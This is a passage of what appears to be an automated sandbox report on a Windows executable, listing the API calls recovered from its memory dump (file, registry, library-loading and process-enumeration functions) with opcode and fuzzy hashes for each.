                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                                • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Open
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
